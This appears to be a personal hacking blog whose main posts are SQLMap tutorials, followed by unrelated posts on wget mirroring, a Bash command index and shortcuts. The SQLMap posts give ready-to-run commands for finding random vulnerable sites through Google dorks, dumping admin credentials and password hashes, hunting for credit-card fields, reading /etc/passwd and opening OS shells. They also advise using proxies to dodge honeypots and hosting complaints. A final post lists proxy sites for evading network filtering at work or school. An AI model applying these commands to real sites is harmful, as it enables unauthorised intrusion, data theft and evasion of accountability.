Evil Pal

Thursday 26 May 2016

SQLMap Injection with Samples

Hi,

So, here I want to post little about how to use SQLMap in practice.

In my previous post, I’ve shown you how to install SQLMap from GitHub and learn the command options that used most on injection attack.

I’ll start directly from the injection attack samples that used the most command options, so you can practice it further by yourself later.

If you haven’t installed SQLMap, you can read my previous post here:
https://www.blogger.com/blogger.g?blogID=3236000309080110099#editor/target=post;postID=6390705995461280716;onPublishedMenu=allposts;onClosedMenu=allposts;postNum=0;src=postname

# Start SQLMap

$ ./sqlmap.py --update

$ ./sqlmap.py

$ ./sqlmap.py -hh

1. Command option -u

Let’s say, we have target something like:

http://www.domain.com/article.php?id=7

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs

–random-agent: using random browser agent (Firefox, IE, Opera, etc..)
–level: level of injection test to perform (1..5)
–risk: level of injection risk to perform (1..3)
–threads: count of injection attack process thread. Using high number of thread will make the injection attack process run fast, especially in Union, Boolean, Error, Stacked, and Query based type, but avoid using more than 1 thread in Time-based attack.
–batch: make the injection process run automatically, without user input.
–dbs: get database info

That command above will perform attack alternately based on BEUSTQ (Boolean, Error, Union, Stacked, Query, Time), by default. To focus the attack with spesific attack technique, you can set it in the injection command, for example when you do manual injection to this target by doing something like this:

http://www.domain.com/article.php?id=7'

http://www.domain.com/article.php?id=7 and 1=0

and you see there’s an SQL error message on the page, then you might want to set the attack technique with option: –tech=E

Otherwise, if you see nothing, but you are quite sure that there’s an injection point on that page or just want to test the injection, you can leave it the attack technique type to be unset.

2. Command option -g (crawl potential targets from Google results)

With the -g option, we can crawl any potential targets from Google results based on the dork inputted.

Injection command:

$ ./sqlmap.py -g "intext:article.php?id=" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs

To crawl from certain site based on where the country domain registered, eg: .com.sg

$ ./sqlmap.py -g "intext:article.php?id= + site:.com.sg" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs

Ofcourse, you can use any other Google dorks as you wish.

If you see no attack being processed, that means there is no potential injection point that can be injected. Potential injection point of the URL link should contains at least one GET parameter, eg: .php?id=, .asp?pid=, etc..

3. Command option –crawl

Injection command:

$ ./sqlmap.py -u "http://www.domain.com" --random-agent --level 2 --risk 2 --threads 5 --batch --crawl=3 --dbs

That command above will crawl to every links found in certain website and will inject link which has GET parameter in it.

–crawl: crawl through every links in a website page. We use –crawl=3 means it will crawl deeply till the depth of “3″.

For example:

http://www.domain.com, has a menu link called “articles”.

Depth 1: http://www.domain.com/articles
Depth 2: http://www.domain.com/articles/newest/
Depth 3: http://www.domain.com/articles/newest/funny-topics/
Depth 4: http://www.domain.com/articles/newest/funny-topics/author/

Our option –crawl=3 will crawl any links found in depth 1, 2, and 3, but not depth 4. Okay, hope you understand.

You are free to set any crawl depth as you want. But, remember the more you set the crawl depth, the more you will get many links to inject (if it has GET parameter).

4. Command option –forms

Injection command:

$ ./sqlmap.py -u "http://www.domain.com" --random-agent --level 2 --risk 2 --threads 5 --batch --forms --dbs

That command above will try to search for any POST form in the website page. For example: in homepage there will be some forms like search, login forms, etc.

But, how if the POST form are in another page deeply in the website and we don’t know where it is? We can join with the previous command –crawl.

$ ./sqlmap.py -u "http://www.domain.com" --random-agent --level 2 --risk 2 --threads 5 --batch --crawl=3 --forms --dbs

5. Command option –proxy

The proxy option format is: (http|https|socks4|socks5)://url:port

Find some working IP proxy and port, eg: http://hidemyass.com/proxy-list

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --proxy="https://123.123.123.123:3128" --dbs

6. Command option –dbms

Suppose that we’re pretty sure that the target website uses database type MySQL. We can set it in the command with option –dbms=mysql, so that it will be faster in injection attack, rather than rotate through all of database types, like Oracle, MSSQL, etc.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --forms --dbms=mysql --dbs

7. Command option -D, -T, -C

-D: dump database
-T: dump table
-C: dump column

Let’s say we got database name like: sitedb.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T

That command above will enumarate all tables name from certain database that is “sitedb”.

Let’s say we got 15 tables name, one of them is: admin. And we want to enumerate for its columns name.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C

That command above will enumarate all columns name from certain database that is “sitedb” and table “admin”.

Let’s say we got 6 columns name, eg: id, admin_id, admin_pass, admin_fullname, admin_mail, admin_level.

We want to dump all the data in table “admin”.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin --dump

Or if you want to dump only certain columns, like “admin_id” and “admin_pass”.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C admin_id,admin_pass --dump

8. Command option –answers

This option is vry useful if you want the attack process run 100% automatically without any user input.

For example, when you are dumping data from certain table (see command option 6 above), SQLMap will automatically try to crack any string that has format like “password hash”.

Eg:

In dumping the table “admin”, you got 3 record rows, those are:

admin:0cc175b9c0f1b6a831c399e269772661
manager:92eb5ffee6ae2fec3ad71c777531578f
staf:4a8a08f09d37b73795649038408b5f33

Since it found field data like “0cc175b9c0f1b6a831c399e269772661″ which has format like MD5-hash, SQLMap will try to crack it automatically using wordlist in dir “txt”. Cracking 3 hashes with only few wordlist, would take a short time. But what if the hashes found are about 10,000 records and the wordlist count is more than 100,000,000 lines?? Wouldn’t it take long time to wait.

The best idea is dump all data first, then the cracking process can be done later separately. For this purpose, we can use command option –answers, to make SQLMap skip “cracking” process.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C admin_id,admin-pass --dump --answers="crack=N"

–answer=”crack=N”, we take certain unique particular string from the cracking question, that is “crack”, and we set it to “N” = No.

9. Command option –flush-session

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs --flush-session

That command above will make SQLMap to flush all sessions found from previous injection targetted to certain website. This is very useful when you do injection with T (Time) based attack, as sometimes there’s a lagging connection to the target website.

But, be careful using –flush-session, as it will delete all injection sessions and file for that target. This option means the next injection process will start from zero, as if we never inject the target before.

10. Command option –hex

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin -C admin_id,admin-pass --dump --hex --tech=T

Using –hex option is very useful when the injection process uses T (Time) based. Means that the data being retrieved are converted to HEX (hexadecimal) digits before it starts to deliver. This also to avoid any strange characters being retrieved.

11. Command option –no-cast

“cast” function in MySQL means, to convert a string to a different character set.

Eg:

SELECT CAST(_latin1'test' AS CHAR CHARACTER SET utf8);

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs --no-cast

Note that, we can’t join between –no-cast and –hex option. We have to choose one of them in a command.

12. Command option –dump-all

To dump all databases found, but exclude “information_schema” DB or exclude DBMS system database.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dump-all --exclude-sysdbs

13. Command option –count

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T admin --count

To count records/rows in a certain table. Very useful if you want to check how many records/rows in a table before dumping it.

14. Command option –start, –end

Let’s say we found table “member” and there are about 24,000 records in it. And we want to dump start from record “1000″ to “2000″.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb -T member --dump --answers="crack=N" --start=1000 --end=2000

15. Command option –search

Let’s say there are about 90 tables in a certain database, and we want to short our time looking for table contains certain “field name”. Eg: credit_card_type.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb --search="credit_card_type"

It will search through the whole tables in database “sitedb” and find for field name “credit_card_type”.

16. Command option –delay

This option –delay sometime used with T (Time) based attack type, to avoid lagging connection from/to the target and to retrieve data precisely.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --batch --dbs --delay=5 --tech=T

Note, when we use –delay in Time based attack type, there is no “thread” being set. Thread is only 1, by default.

–delay=5, means delay between one attack to next attack is 5 seconds.

17. Command option –common-tables, –common-columns

Suppose we got database name “sitedb”, the database type is MySQL version 4.0. As we know that MySQL version 4 doesn’t have “information_schema” system database, so it will be hard to enumerate the tables/columns name. We gonna use “fuzzing/bruteforcing” technique to get the table and column name.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb --common-tables

That command above will try to bruteforce for the table name based on the tables name list.

Let’s say we have found one table, eg: member. But we don’t have any idea what the column name is. Next, we gonna bruteforce for the column name.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch -D sitedb --common-columns

That command above will try to bruteforce for the column name based on the columns name list.

18. Command option –sql-shell

To prompt for an interactive SQL shell command.

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --sql-shell

It will show an interactive SQL shell command.

For example, we want to make SQL query from table “admin”.

> select count(*) from admin;

You can also use –sql-query directly from the injection command, eg:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --sql-query="select count(*) from admin"

19. Command option –msf-path

To prompt a shell which relates to MSF (Metasploit) Framework. Install MSF first before using this command option.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --msf-path="the_MSF_path_where_it_is_installed"

20. Command option –file-read

To read any (readable) file in the server.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --file-read="/etc/passwd"

21. Command option –tamper

To use tamper for the injection attack. For example, we want to give the injection attack with string “+” for any space character in it. Means it will convert all spaces with string “+”.

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --dbs --tamper tamper/space2plus.py

To short the command for tamper link, you can set shortcut link for all tamper scripts in dir “tamper”.

$ ln -s tamper/space2plus.py space2plus.py

Do the same for other tamper scripts you want to make shortcut for it.

22. Command option –users, –passwords, –roles, –privileges, –is-dba

–users: to enumerate all database users
–passwords: to enumerate all database paswords for each of the users
–roles: to enumerate all roles for each of the users
–privileges: to enumerate all privileges for each of the users
–is-dba: to check whether the current database user is a Database Administrator or not

Injection command:

$ ./sqlmap.py -u "http://www.domain.com/article.php?id=7" --random-agent --level 2 --risk 2 --threads 5 --batch --users --passwords --roles --privileges --is-dba

Useful if you want to check whether the current database user is a DB Administrator or not, or to check the user has “write” privilege or not. If the user has “write” privilege, then we might has chance to write file on the server. It’s just like “mysql_into_outfile” command.

Okay, I think that’s enough for this post. I’m so sleepy and want to take a rest.

Good luck with your injection.

Note:
- If you do injection with SQLMap from VPS (Virtual Private Server) and process google results, be careful .. sometimes you don’t realize that the target site you’re attacked is a “honeypot“. It’s a trap usually set by security company or internet monitoring company. Once you’re trapped in the honeypot server, it will record all your injection/hacking activities and your IP. Then, the company authority will file for legal report to your hosting company, and you gonna get warning from them very soon. You’re lucky if you only get warning, but if you do that many times, hosting company may block/suspend your VPS service because of illegal activities. So, just be careful with the target you’re trying to hack, you can use proxy IP to cover your real IP.

Using SQLMap for SQL Injection

Hi,

There are many SQL injection (SQLi) tools we can find on the net, some of them are SQL Ninja, SQLMap, Pangolin, Havij, Reiluke Tools, schemafuzz.py, etc.
For me, I have tried all tools mentioned above. And only SQLMap I like most. It has many features for SQL injection, such as tamper and payload. With various kind of tampers, we can handle any tricky SQLi query.
If you have familiar enough with SQLMap, you can skip read this post. Note that, SQLMap needs Python version > 2.6.
1/ Clone SQLMap from GIT repository
$ git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
[sqlmap-dev] can be changed to anything name you want.
2/ Go into SQLMap directory
$ cd sqlmap-dev
Make sqlmap.py executable:
$ chmod +x sqlmap.py
3/ Run SQLMap for the first time
$ ./sqlmap.py
4/ Learn and understand well the command options provided by SQLMap.
$ ./sqlmap.py --help
The most frequently commands you will use are:



-u URL, --url=URL (target URL)

--random-agent (use random agent in injection process)

--tamper (for using tamper when it's needed)

--batch (for batch process, you don't need to enter anything in the command)

--no-cast (turn of payload casting mechanism)

--hex (using hex functions for data retrieval)

--level (level of test to perfom, range 1 - 5)

--risk (risk of test to perform, range 0 - 3)

--text-only (use this if you think most of the web page contents are about 80% text), more faster injection process

--technique (SQLi technique to use, default BEUSTQ)

--time-sec (use this if connection to the web target is taking too long time to load)

--dbs (database name retrieval)

--table (enumerates table name)

--column (enumerates column name)

--threads (thread to use in injection process, recommended 5 .. maximum 10)

--dump (dump data from spesific database)

--dump-all (dump data from all databases)

--exclude-sysdbs (exclude dumping system database, eg: information_schema, mysql)

--user (enumerates all database users)

--password (enumerates all password per database user)

--privileges (enumerates all privileges per database user, we want to 
check if there's a root with full privileges, eg: FILES privileges to 
write into web document files)

--roles (enumerates all roles per database user)

--file-read (to read spesific file, eg: /etc/passwd)

--os-shell (to spawn shell into the web target)

--sql-shell (to spawn sql shell and execute sql query command)

--start (start dump from row n)

--stop (stop dump until row n)

--count (to count table row)

-g (to process google dork and get the result as the web target for injection)

--crawl (to crawl all links in certain web URL)

--os-pwn (to prompt for an out-of-band shell, meterpreter or VNC, if you have MSF installed)

--forms (to inject any links contains form page with POST method)

--update (update SQLMap)

And the rest of the commands you can read and learn by yourself.
In Windows environment, just install Python 2.7 and start running SQLMap. You can also use Cygwin to get a UNIX-like environment. If you intend to get SQLMap directly from its GIT repository, don’t forget to install GIT for windows.
SQLMap project on GIT can be found here:
https://github.com/sqlmapproject/sqlmap
Next post will be SQLMap in-practice tutorial. Thanks for reading.

Make Offline Mirror of a Site using `wget`

Sometimes you want to create an offline copy of a site that you can take and view even without internet access. Using wget you can make such copy easily:

wget --mirror --convert-links --adjust-extension --page-requisites 
--no-parent http://example.org

Explanation of the various flags:

--mirror – Makes (among other things) the download recursive.
--convert-links – convert all the links (also to stuff like CSS stylesheets) to relative, so it will be suitable for offline viewing.
--adjust-extension – Adds suitable extensions to filenames (html or css) depending on their content-type.
--page-requisites – Download things like CSS style-sheets and images required to properly display the page offline.
--no-parent – When recursing do not ascend to the parent directory. It useful for restricting the download to only a portion of the site.

Alternatively, the command above may be shortened:

wget -mkEpnp http://example.org

Note: that the last p is part of np (--no-parent) and hence you see p twice in the flags.

Wednesday 1 January 2014

An A-Z Index of the Bash command line for Linux

An A-Z Index of the Bash command line for Linux.

alias    Create an alias •
apropos Search Help manual pages (man -k)
apt-get Search for and install software packages (Debian/Ubuntu)
aptitude Search for and install software packages (Debian/Ubuntu)
aspell   Spell Checker
awk      Find and Replace text, database sort/validate/index
b
basename Strip directory and suffix from filenames
bash     GNU Bourne-Again SHell
bc       Arbitrary precision calculator language
bg       Send to background
break    Exit from a loop •
builtin Run a shell builtin
bzip2    Compress or decompress named file(s)
c
cal      Display a calendar
case     Conditionally perform a command
cat      Concatenate and print (display) the content of files
cd       Change Directory
cfdisk   Partition table manipulator for Linux
chgrp    Change group ownership
chmod    Change access permissions
chown    Change file owner and group
chroot   Run a command with a different root directory
chkconfig System services (runlevel)
cksum    Print CRC checksum and byte counts
clear    Clear terminal screen
cmp      Compare two files
comm     Compare two sorted files line by line
command Run a command - ignoring shell functions •
continue Resume the next iteration of a loop •
cp       Copy one or more files to another location
cron     Daemon to execute scheduled commands
crontab Schedule a command to run at a later time
csplit   Split a file into context-determined pieces
curl     Transfer data from or to a server
cut      Divide a file into several parts
d
date     Display or change the date & time
dc       Desk Calculator
dd       Convert and copy a file, write disk headers, boot records
ddrescue Data recovery tool
declare Declare variables and give them attributes •
df       Display free disk space
diff     Display the differences between two files
diff3    Show differences among three files
dig      DNS lookup
dir      Briefly list directory contents
dircolors Colour setup for `ls'
dirname Convert a full pathname to just a path
dirs     Display list of remembered directories
dmesg    Print kernel & driver messages
du       Estimate file space usage
e
echo     Display message on screen •
egrep    Search file(s) for lines that match an extended expression
eject    Eject removable media
enable   Enable and disable builtin shell commands •
env      Environment variables
ethtool Ethernet card settings
eval     Evaluate several commands/arguments
exec     Execute a command
exit     Exit the shell
expect   Automate arbitrary applications accessed over a terminal
expand   Convert tabs to spaces
export   Set an environment variable
expr     Evaluate expressions
f
false    Do nothing, unsuccessfully
fdformat Low-level format a floppy disk
fdisk    Partition table manipulator for Linux
fg       Send job to foreground
fgrep    Search file(s) for lines that match a fixed string
file     Determine file type
find     Search for files that meet a desired criteria
fmt      Reformat paragraph text
fold     Wrap text to fit a specified width.
for      Expand words, and execute commands
format   Format disks or tapes
free     Display memory usage
fsck     File system consistency check and repair
ftp      File Transfer Protocol
function Define Function Macros
fuser    Identify/kill the process that is accessing a file
g
gawk     Find and Replace text within file(s)
getopts Parse positional parameters
grep     Search file(s) for lines that match a given pattern
groupadd Add a user security group
groupdel Delete a group
groupmod Modify a group
groups   Print group names a user is in
gzip     Compress or decompress named file(s)
h
hash     Remember the full pathname of a name argument
head     Output the first part of file(s)
help     Display help for a built-in command •
history Command History
hostname Print or set system name
htop     Interactive process viewer
i
iconv    Convert the character set of a file
id       Print user and group id's
if       Conditionally perform a command
ifconfig Configure a network interface
ifdown   Stop a network interface
ifup     Start a network interface up
import   Capture an X server screen and save the image to file
install Copy files and set attributes
ip       Routing, devices and tunnels
j
jobs     List active jobs •
join     Join lines on a common field
k
kill     Kill a process by specifying its PID
killall Kill processes by name
l
less     Display output one screen at a time
let      Perform arithmetic on shell variables •
link     Create a link to a file
ln       Create a symbolic link to a file
local    Create variables •
locate   Find files
logname Print current login name
logout   Exit a login shell •
look     Display lines beginning with a given string
lpc      Line printer control program
lpr      Off line print
lprint   Print a file
lprintd Abort a print job
lprintq List the print queue
lprm     Remove jobs from the print queue
ls       List information about file(s)
lsof     List open files
m
make     Recompile a group of programs
man      Help manual
mkdir    Create new folder(s)
mkfifo   Make FIFOs (named pipes)
mkisofs Create an hybrid ISO9660/JOLIET/HFS filesystem
mknod    Make block or character special files
more     Display output one screen at a time
most     Browse or page through a text file
mount    Mount a file system
mtools   Manipulate MS-DOS files
mtr      Network diagnostics (traceroute/ping)
mv       Move or rename files or directories
mmv      Mass Move and rename (files)
n
nc       Netcat, read and write data across networks
netstat Networking information
nice     Set the priority of a command or job
nl       Number lines and write files
nohup    Run a command immune to hangups
notify-send Send desktop notifications
nslookup Query Internet name servers interactively
o
open     Open a file in its default application
op       Operator access
p
passwd   Modify a user password
paste    Merge lines of files
pathchk Check file name portability
ping     Test a network connection
pkill    Kill processes by a full or partial name.
popd     Restore the previous value of the current directory
pr       Prepare files for printing
printcap Printer capability database
printenv Print environment variables
printf   Format and print data •
ps       Process status
pushd    Save and then change the current directory
pv       Monitor the progress of data through a pipe
pwd      Print Working Directory
q
quota    Display disk usage and limits
quotacheck Scan a file system for disk usage
r
ram      ram disk device
rar      Archive files with compression
rcp      Copy files between two machines
read     Read a line from standard input •
readarray Read from stdin into an array variable •
readonly Mark variables/functions as readonly
reboot   Reboot the system
rename   Rename files
renice   Alter priority of running processes
remsync Synchronize remote files via email
return   Exit a shell function
rev      Reverse lines of a file
rm       Remove files
rmdir    Remove folder(s)
rsync    Remote file copy (Synchronize file trees)
s
screen   Multiplex terminal, run remote shells via ssh
scp      Secure copy (remote file copy)
sdiff    Merge two files interactively
sed      Stream Editor
select   Accept keyboard input
seq      Print numeric sequences
set      Manipulate shell variables and functions
sftp     Secure File Transfer Program
shift    Shift positional parameters
shopt    Shell Options
shutdown Shutdown or restart linux
sleep    Delay for a specified time
slocate Find files
sort     Sort text files
source   Run commands from a file '.'
split    Split a file into fixed-size pieces
ssh      Secure Shell client (remote login program)
stat     Display file or file system status
strace   Trace system calls and signals
su       Substitute user identity
sudo     Execute a command as another user
sum      Print a checksum for a file
suspend Suspend execution of this shell •
sync     Synchronize data on disk with memory
t
tail     Output the last part of file
tar      Store, list or extract files in an archive
tee      Redirect output to multiple files
test     Evaluate a conditional expression
time     Measure Program running time
timeout Run a command with a time limit
times    User and system times
touch    Change file timestamps
top      List processes running on the system
tput     Set terminal-dependent capabilities, color, position
traceroute Trace Route to Host
trap     Run a command when a signal is set(bourne)
tr       Translate, squeeze, and/or delete characters
true     Do nothing, successfully
tsort    Topological sort
tty      Print filename of terminal on stdin
type     Describe a command •
u
ulimit   Limit user resources •
umask    Users file creation mask
umount   Unmount a device
unalias Remove an alias •
uname    Print system information
unexpand Convert spaces to tabs
uniq     Uniquify files
units    Convert units from one scale to another
unrar    Extract files from a rar archive
unset    Remove variable or function names
unshar   Unpack shell archive scripts
until    Execute commands (until error)
uptime   Show uptime
useradd Create new user account
userdel Delete a user account
usermod Modify user account
users    List users currently logged in
uuencode Encode a binary file
uudecode Decode a file created by uuencode
v
v        Verbosely list directory contents (`ls -l -b')
vdir     Verbosely list directory contents (`ls -l -b')
vi       Text Editor
vmstat   Report virtual memory statistics
w
wait     Wait for a process to complete •
watch    Execute/display a program periodically
wc       Print byte, word, and line counts
whereis Search the user's $path, man pages and source files for a program
which    Search the user's $path for a program file
while    Execute commands
who      Print all usernames currently logged in
whoami   Print the current user id and name (`id -un')
wget     Retrieve web pages or files via HTTP, HTTPS or FTP
write    Send a message to another user
x
xargs    Execute utility, passing constructed argument list(s)
xdg-open Open a file or URL in the user's preferred application.
xz       Compress or decompress .xz and .lzma files
yes      Print a string until interrupted
zip      Package and compress (archive) files.
.        Run a command script in the current shell
!!       Run the last command again
###      Comment / Remark

Keyboard Shortcuts for Bash ( Command Shell for Ubuntu, Debian, Suse, Redhat, Linux, etc)

The default shell on most Linux operating systems is called Bash. There are a couple of important hotkeys that you should get familiar with if you plan to spend a lot of time at the command line. These shortcuts will save you a ton of time if you learn them.

Ctrl + A	Go to the beginning of the line you are currently typing on
Ctrl + E	Go to the end of the line you are currently typing on
Ctrl + L	Clears the Screen, similar to the clear command
Ctrl + U	Clears the line before the cursor position. If you are at the end of the line, clears the entire line.
Ctrl + H	Same as backspace
Ctrl + R	Let’s you search through previously used commands
Ctrl + C	Kill whatever you are running
Ctrl + D	Exit the current shell
Ctrl + Z	Puts whatever you are running into a suspended background process. fg restores it.
Ctrl + W	Delete the word before the cursor
Ctrl + K	Clear the line after the cursor
Ctrl + T	Swap the last two characters before the cursor
Esc + T	Swap the last two words before the cursor
Alt + F	Move cursor forward one word on the current line
Alt + B	Move cursor backward one word on the current line
Tab	Auto-complete files and folder names

Note that some of these commands may not work if you are accessing bash through a telnet/ssh session, or depending on how you have your keys mapped.

Breaking down the Proxy Blocking, why not?

Hi there !
Hope u’re all in fine condition yeah.
To spend this sunday holiday, I wrote simple article ’bout internet stuff that may increase our knowledge.
Okay, I wanna explain ’bout how to break down the proxy server blocking in ur network. This trick is really useful for u who the internet connection access is in the back proxy of office, school, company, corporate, etc. I believe that most of u knew what proxy is. Yes !! proxy is a computer server (or perhaps a program application) which receive request from computer client sent to the computer server (like gateway server or internet server). Since it has function to be the middle node between client and server, then the proxy often used for filtering requests under the security rules of his/her network.

The rules set for this proxy, such as :

1. filter request to web page which has malicious content.
2. manage which ports may accessed by the clients and close ports in its network.
3. filter certain keywords which has porn/fraud contents.
and many functions done by the proxy server.
But, have u ever imagine on breaking down that blocking ??
Is it possible to break down proxy blocking ??
The answer is YESS, we can do that !
If there’s a proxy, then there’ll be anti-proxy. Anti-proxy often called by circumventor-proxy. Circumventor is a method on how we broke down the proxy blocking in our local network. Technically, circumventor is a proxy too which located in different computer server.
Btw, there are many many servers in the world that serve proxy server for users. And, these are the lists of website that has circumventor proxy :

http://beetlecop.com
http://unblock.w201.100dns.com/free
http://www.LeeProxy.com
http://sgqhz.w26.100dns.com/go
http://www.mmproxy.com
http://freego.homeblock.com
http://gateway.joost.co.uk/
http://tunnel.co.nr/
http://www.fastestproxysite.info/
http://www.hiddencloak.com/
http://www.hiddencloak.com/
http://proxy.marveloustheatre.com/
http://www.veloxproxy.com/
http://proxy.hyperdeathbabies.com/
http://www.sweetproxies.com/submit/
http://tempidentity.com/
http://www.proxypoodle.com/
http://www.searcharticles.in/myspace/
http://www.xp1.info/
http://proxijoy.co.uk/
http://boldproxy.com/
http://www.iwantsurf.com/
http://proxy.rootname.cn/
http://proxy.chuui.jp/
http://www.proxy885.info/
http://www.changeinternet.com/
http://www.hidebliss.com/
http://www.proxyheat.com/
http://www.zaxiproxy.com/
http://www.unblockmath.com/
http://nie.skasowane.pl/gl/
http://anon.browser-security.info/13/
http://www.footballscorelive.com/
http://r.ls.la/p1/
http://www.todaysproxy.com/
http://www.proxyforall.com/
http://bigexploit.info/
http://www.access24h.com/

Tips for using circumventor proxy, use proxy server that has close distance with your location.

Ok…enjoy ur breaking down the proxy blocking !!